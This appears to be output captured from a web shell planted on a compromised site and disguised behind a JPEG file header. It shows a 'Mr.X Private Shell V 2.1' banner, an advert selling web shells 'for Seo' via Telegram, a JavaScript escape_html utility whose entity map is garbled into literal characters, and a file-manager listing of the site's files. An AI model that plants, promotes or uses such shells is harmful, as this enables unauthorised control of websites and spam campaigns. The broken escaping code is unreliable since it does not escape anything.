����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
export function escape_html(value) {
const map = {
'&': '&',
'<': '<',
'>': '>',
'"': '"',
"'": ''',
"/": '/',
'`': '`',
};
const reg = /[&<>"'/]/ig;
return value.replace(reg, (match)=>(map[match]));
}
export function unescape_html(value) {
var div = document.createElement('div');
div.innerHTML = value;
var child = div.childNodes[0];
return child ? child.nodeValue : '';
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Widget | Folder | 0755 |
|
|
| Block.php | File | 397 B | 0644 |
|
| icons.js | File | 2.95 KB | 0644 |
|
| utils.js | File | 515 B | 0644 |
|